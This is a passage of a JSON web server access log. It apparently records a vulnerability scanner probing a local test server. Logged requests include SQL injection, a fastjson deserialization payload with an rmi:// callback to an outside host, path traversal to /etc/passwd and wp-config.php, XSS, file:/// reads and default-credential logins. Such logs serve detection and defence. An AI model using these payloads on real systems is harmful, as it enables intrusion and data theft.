Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/6 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbraAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22dashboard\x22: {\x22editable\x22:false,\x22hideControls\x22:true,\x22nav\x22:[{\x22enable\x22:false,\x22type\x22:\x22timepicker\x22}],\x22rows\x22: [{}],\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{},\x22timezone\x22:\x22browser\x22,\x22title\x22:\x22Home\x22,\x22version\x22:5},\x22expires\x22: 3600}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22userName\x22:\x22engineer\x22,\x22password\x22:\x22engineer\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x0D\x0A \x22a\x22:{\x0D\x0A \x22@type\x22:\x22java.lang.Class\x22,\x0D\x0A \x22val\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22\x0D\x0A },\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28fg0smpvbd3qg07h0i1cnk5tcj3jwf.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modifica_cliente.php?tipo_tabella=%22>&idclienti=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlrpc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"SSe528uE","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /functionRouter HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /perl-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet/showenv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22userName\x22:\x22guest\x22,\x22password\x22:\x22guest\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///etc/passwd\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dati/availability_tpl.php?num_app_tipo_richiesti1=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/metadata HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/dbstat/gettablessize HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/redirection/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///c://windows/win.ini\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?location=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /npm-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/tasks HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?layout=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token 